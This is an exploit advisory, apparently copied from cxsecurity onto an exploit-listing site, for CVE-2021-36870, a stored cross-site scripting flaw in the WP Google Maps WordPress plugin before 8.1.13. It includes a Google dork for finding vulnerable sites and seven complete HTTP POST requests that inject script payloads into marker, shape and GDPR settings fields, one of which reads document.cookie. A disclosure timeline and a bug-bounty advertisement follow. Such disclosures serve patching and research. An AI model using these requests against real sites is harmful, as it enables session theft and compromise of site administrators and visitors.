Advertisement






WP Google Maps Plugin < 8.1.13 - Authenticated Persistent XSS

CVE Category Price Severity
CVE-2021-36870 CWE-79 Not specified High
Author Risk Exploitation Type Date
Not specified High Authenticated Persistent XSS 2021-09-20
CVSS
3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090109

Below is a copy:

WP Google Maps Plugin < 8.1.13 - Authenticated Persistent XSS
[+] :: VULNERABILITY: WP Google Maps Plugin < 8.1.13 - Authenticated Persistent XSS
[+] :: GOOGLE DORK: inurl:/wp-content/plugins/wp-google-maps/
[+] :: DATE: 2021-06-04
[+] :: SECURITY RESEARCHER: Visse [ https://visse.ru ]
[+] :: VENDOR: WP Google Maps [ https://www.wpgmaps.com ]
[+] :: SOFTWARE VERSION: < 8.1.13
[+] :: SOFTWARE LINK: https://wordpress.org/plugins/wp-google-maps/
[+] :: CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
[+] :: CWE: CWE-79
[+] :: CVE: CVE-2021-36870



[i] == [ Info: ]

An Authenticated Persistent XSS vulnerability was discovered in the WP Google Maps plugin through v8.1.13 for WordPress.

Vulnerable parameter(s): &address, &polyname (x2), &name (x2), &wpgmza_gdpr_company_name, &wpgmza_gdpr_retention_purpose.



[?] == [ Code: ]

-



[$] == [ Impact: ]

Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



[%] == [ Payloads: ]

<script>alert(origin)</script>

<script>alert(document.domain)</script>



[!] == [ PoC #1 | Authenticated Persistent XSS | Maps > Markers > &address: ]

POST /wp-json/wpgmza/v1/markers/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e7db87e0a9
X-Requested-With: XMLHttpRequest
Content-Length: 125

id=-1&map_id=1&address=%3Cscript%3Ealert(origin)%3C%2Fscript%3E&lat=39.953798&lng=-75.17193&anim=0&infoopen=0&approved=1



[!] == [ PoC #2 | Authenticated Persistent XSS | Maps > Polygons > &polyname: ]

POST /wp-json/wpgmza/v1/polygons/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e722c293b0
X-Requested-With: XMLHttpRequest
Content-Length: 378

id=-1&map_id=1&polyname=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&title=&description=&link=&linecolor=%23666666&lineopacity=0.5&fillcolor=%23cc0000&opacity=0.5&ohlinecolor=%23333333&ohfillcolor=%23ff0000&ohopacity=0.7&polydata=%5B%7B%22lat%22%3A36.77828315944244%2C%22lng%22%3A-119.41792718131755%7D%2C%7B%22lat%22%3A36.77826892670358%2C%22lng%22%3A-119.41787688989852%7D%5D



[!] == [ PoC #3 | Authenticated Persistent XSS | Maps > Polylines > &polyname: ]

POST /wp-json/wpgmza/v1/polylines/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e722c293b0
X-Requested-With: XMLHttpRequest
Content-Length: 274

id=-1&map_id=1&polyname=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&linecolor=%23000000&opacity=0.5&linethickness=4&polydata=%5B%7B%22lat%22%3A36.778279399851286%2C%22lng%22%3A-119.4179590325496%7D%2C%7B%22lat%22%3A36.77827134358396%2C%22lng%22%3A-119.41787018437599%7D%5D



[!] == [ PoC #4 | Authenticated Persistent XSS | Maps > Circles > &name: ]

POST /wp-json/wpgmza/v1/circles/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e722c293b0
X-Requested-With: XMLHttpRequest
Content-Length: 171

id=-1&map_id=1&center=36.778281548189106%2C+-119.41786884327148&name=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&radius=0.0027967709419604793&color=%23000000&opacity=0.5



[!] == [ PoC #5 | Authenticated Persistent XSS | Maps > Rectangles > &name: ]

POST /wp-json/wpgmza/v1/rectangles/ HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Wp-Nonce: 8b3dbb283b
X-Wpgmza-Action-Nonce: e722c293b0
X-Requested-With: XMLHttpRequest
Content-Length: 191

id=-1&map_id=1&cornerA=36.7782930621891%2C+-119.41787860787272&cornerB=36.778272115895994%2C+-119.41782898700595&name=%3Cscript%3Ealert(%2FVisse%2F)%3C%2Fscript%3E&color=%23000000&opacity=0.5



[!] == [ PoC #6 | Authenticated Persistent XSS | Settings > GDPR Compliance > Company Name > &wpgmza_gdpr_company_name: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1989

nonce=f3223b635d&action=wpgmza_save_settings&wpgmza_maps_engine=google-maps&user_interface_style=minimal&wpgmza_settings_cat_logic=0&wpgmza_settings_filterbycat_type=1&use_fontawesome=4.*&tile_server_url=&tile_server_url_override=&wpgmza_load_engine_api_condition=where-required&wpgmza_always_include_engine_api_on_pages=&wpgmza_always_exclude_engine_api_on_pages=&wpgmza_settings_access_level=manage_options&wpgmza_settings_retina_width=13&wpgmza_settings_retina_height=13&wpgmza_settings_image_width=&wpgmza_settings_image_height=&wpgmza_settings_infowindow_width=&wpgmza_settings_infowindow_link_text=&wpgmza_settings_map_open_marker_by=1&wpgmza_store_locator_radii=&wpgmza_google_maps_api_key=&open_layers_api_key=&wpgmza_settings_marker_pull=0&wpgmza_marker_xml_location=&wpgmza_marker_xml_url=&wpgmza_custom_css=&wpgmza_custom_js=&wpgmza_gdpr_require_consent_before_load=on&wpgmza_gdpr_company_name=%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E&wpgmza_gdpr_retention_purpose=displaying+map+tiles%2C+geocoding+addresses+and+calculating+and+display+directions.&wpgmza_gdpr_override_notice=on&wpgmza_gdpr_notice_override_text=



[!] == [ PoC #7 | Authenticated Persistent XSS | Settings > GDPR Compliance >  Retention Purpose(s) > &wpgmza_gdpr_retention_purpose: ]

POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1989

nonce=f3223b635d&action=wpgmza_save_settings&wpgmza_maps_engine=google-maps&user_interface_style=minimal&wpgmza_settings_cat_logic=0&wpgmza_settings_filterbycat_type=1&use_fontawesome=4.*&tile_server_url=&tile_server_url_override=&wpgmza_load_engine_api_condition=where-required&wpgmza_always_include_engine_api_on_pages=&wpgmza_always_exclude_engine_api_on_pages=&wpgmza_settings_access_level=manage_options&wpgmza_settings_retina_width=13&wpgmza_settings_retina_height=13&wpgmza_settings_image_width=&wpgmza_settings_image_height=&wpgmza_settings_infowindow_width=&wpgmza_settings_infowindow_link_text=&wpgmza_settings_map_open_marker_by=1&wpgmza_store_locator_radii=&wpgmza_google_maps_api_key=&open_layers_api_key=&wpgmza_settings_marker_pull=0&wpgmza_marker_xml_location=&wpgmza_marker_xml_url=&wpgmza_custom_css=&wpgmza_custom_js=&wpgmza_gdpr_require_consent_before_load=on&wpgmza_gdpr_company_name=PoC&wpgmza_gdpr_retention_purpose=displaying+map+tiles%2C+geocoding+addresses+and+calculating+and+display+directions.%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&wpgmza_gdpr_override_notice=on&wpgmza_gdpr_notice_override_text=



[*] == [ Timeline: ]

2021.06.03 - WP Google Maps Plugin v8.1.12 released
2021.06.04 - Multiple XSS issues discovered
2021.06.09 - Vendor contacted
2021.06.15 - WP Google Maps Plugin v8.1.13 released



[@] == [ Contacts: ]

Website: visse.ru
LinkedIn: @visse
Medium: @visse
HackerOne: @visse



====================================================================
= Want money for vulnerabilities in the WordPress ecosystem? [Y/n] =
= ---------------------------------------------------------------- =
= [ Yes: ] Join the $ hunt here - https://patchstack.com/red-team/ =
= [ No:  ] Hunter, think twice and don't miss the chance to gain $ =
====================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.